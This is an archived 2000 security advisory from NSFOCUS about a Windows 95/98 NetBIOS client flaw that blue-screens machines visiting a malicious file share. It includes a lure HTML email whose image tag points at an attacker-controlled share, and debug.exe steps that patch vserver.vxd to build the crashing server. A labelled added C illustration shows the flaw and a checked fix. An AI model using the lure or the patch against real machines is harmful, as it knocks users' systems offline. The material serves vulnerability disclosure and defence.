Subject: NSFOCUS SA2000-04: Microsoft Win9x client driver type comparing vulnerability
From: Steve (stevem WIN2000MAG.COM)
Date: Fri Oct 13 2000 - 18:11:16 CDT
NSFOCUS Security Advisory(SA2000-04)
Topic: Microsoft Win9x client driver type comparing vulnerability
Release Date: Aug 20, 2000
Update Date: Oct 11, 2000
Affected System:
================
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition
Non-affected system:
===================
- Microsoft Windows NT
- Microsoft Windows 2000
Impact:
=========
The NSFOCUS security team has found a security flaw in the Microsoft Win9x NETBIOS
client. By exploiting this vulnerability, a malicious attacker can modify his
file share service and perform a DoS attack against any Win9x client that visits it.
Description£º
============
When a Win9x client accesses a NETBIOS file share service and compares the driver
types, if the type returned by the server is none of the following: "?????", " A:",
" LPT1:", " COMM" or "IPC", the comparison falls through to a sixth result, which is
bogus because only five types exist. The Win9x client therefore obtains a wrong
driver pointer from the conversion, transfers control to the wrong driver function
address and finally crashes.
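The defect described above is a classic unchecked table dispatch: a chain of string comparisons that yields an index one past the end of the table when nothing matches, and a caller that indexes a function-pointer table with it. The following C is an added illustration, not NSFOCUS's or Microsoft's code; the five type strings are the ones the advisory lists, while the handler names, the table layout and the return values are assumptions made for the example. It shows the fall-through lookup beside a checked lookup that refuses unknown types before any pointer is fetched.

```c
#include <stdio.h>
#include <string.h>

/* The five type strings the advisory says the client recognises.
   (Constructed table; the real VxD compares them in its own way.) */
#define NUM_TYPES 5
static const char *const kKnownTypes[NUM_TYPES] = {
    "?????", " A:", " LPT1:", " COMM", "IPC"
};

/* One handler per known type. Hypothetical stand-ins that report which
   slot ran, so a caller can see where control went. */
typedef int (*type_handler_t)(void);
static int h_unknown(void) { return 0; }
static int h_disk(void)    { return 1; }
static int h_printer(void) { return 2; }
static int h_comm(void)    { return 3; }
static int h_ipc(void)     { return 4; }
static const type_handler_t kHandlers[NUM_TYPES] = {
    h_unknown, h_disk, h_printer, h_comm, h_ipc
};

/* Vulnerable pattern: walk the comparisons and return the loop counter.
   A server-controlled string that matches nothing yields NUM_TYPES (5),
   the "sixth result" the advisory describes. Indexing kHandlers with it
   reads one slot past the table and calls through whatever lies there. */
int type_index_fallthrough(const char *type)
{
    int i = 0;
    while (i < NUM_TYPES && strcmp(type, kKnownTypes[i]) != 0)
        i++;
    return i;   /* 0..4 for known types, 5 for anything else */
}

/* Is this index outside the handler table? Used to show the bug without
   actually dereferencing a wild pointer. */
int index_is_out_of_table(int i)
{
    return i < 0 || i >= NUM_TYPES;
}

/* Hardened pattern: unknown input is rejected with a sentinel, never
   turned into a table index. */
int type_index_checked(const char *type)
{
    for (int i = 0; i < NUM_TYPES; i++)
        if (strcmp(type, kKnownTypes[i]) == 0)
            return i;
    return -1;
}

/* Bounds-checked dispatch: returns the handler's result for a known type
   and -1 for anything the server sends that the client does not know. */
int dispatch_checked(const char *type)
{
    int i = type_index_checked(type);
    if (index_is_out_of_table(i))
        return -1;
    return kHandlers[i]();
}

int main(void)
{
    /* Constructed server replies: one valid, one that matches nothing. */
    const char *replies[] = { " A:", "BOGUS" };
    for (size_t n = 0; n < sizeof replies / sizeof replies[0]; n++) {
        int bad = type_index_fallthrough(replies[n]);
        printf("reply \"%s\": fallthrough index %d (%s), checked dispatch %d\n",
               replies[n], bad,
               index_is_out_of_table(bad) ? "OUT OF TABLE" : "ok",
               dispatch_checked(replies[n]));
    }
    return 0;
}
```

The checked variant is the shape a client-side parser should take for any value the peer controls: map the input to a closed set first, and make the "not in the set" outcome an explicit error path rather than the remainder of a loop counter.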
A malicious user can send an HTML email to his target.
A sample file looks like this:
<html>
<body>
hello
<img src="file:\\attacker.host\pub\a.gif">
</body>
</html>
When a Win9x client reads the malicious HTML email with Outlook Express or another
email client with HTML support, the client will be DoSed.
Exploits:
==========
You can do it like this (Windows 98 Second Edition, English version):
D:\WIN98\SYSTEM>debug vserver.vxd
-d 2b60
1266:2B60 3C 01 75 24 8B C8 C1 E9-10 83 F9 6A 73 05 83 F9   <.u$.......js...
1266:2B70 64 73 1B 83 F9 13 72 10-83 F9 1F 76 0C 80 7F 3E   ds....r....v...>
1266:2B80 05 73 05 83 F9 58 77 21-C3 66 B8 03 38 C3 83 F9   .s...Xw!.f..8...
1266:2B90 65 74 10 83 F9 68 74 32-83 F9 67 75 1B B8 03 38   et...ht2..gu...8
1266:2BA0 1A 00 C3 B8 03 38 1E 00-C3 83 F9 6E 74 10 83 F9   .....8.....nt...
1266:2BB0 70 74 11 83 F9 6C 74 12-B8 03 38 1F 00 C3 B8 01   pt...lt...8.....
1266:2BC0 00 02 00 C3 B8 03 38 27-00 C3 B8 03 38 15 00 C3   ......8'....8...
1266:2BD0 91 FE 48 32 75 0E 83 78-2A 00 74 08 8D 40 2A E8   ..H2u..x*.t..@*.
-n vserver.bak (backup)
-w
Writing 1B8F8 bytes
-n vserver.vxd
-e 2b60 33 c0 c3
-w
Writing 1B8F8 bytes
-q
Reboot the machine.
Set a password for a shared directory.
Access the shared directory from another Win9x client.
Usually the client will get a "blue screen", then the system will become unstable
or halt.
Workaround:
====================
Don't access file share services on untrusted hosts.
Disable NetBIOS over TCP/IP.
Solutions:
====================
Microsoft has been informed.
DISCLAIMER:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT
WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY.
IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER
INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF
BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN
ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR
REPRODUCTION OF THE INFORMATION IS PERMITTED PROVIDED THAT THE ADVISORY
IS NOT MODIFIED IN ANY WAY.
(c) 1999-2000 Nsfocus. All rights reserved. Terms of use.
Nsfocus Security Team <security nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)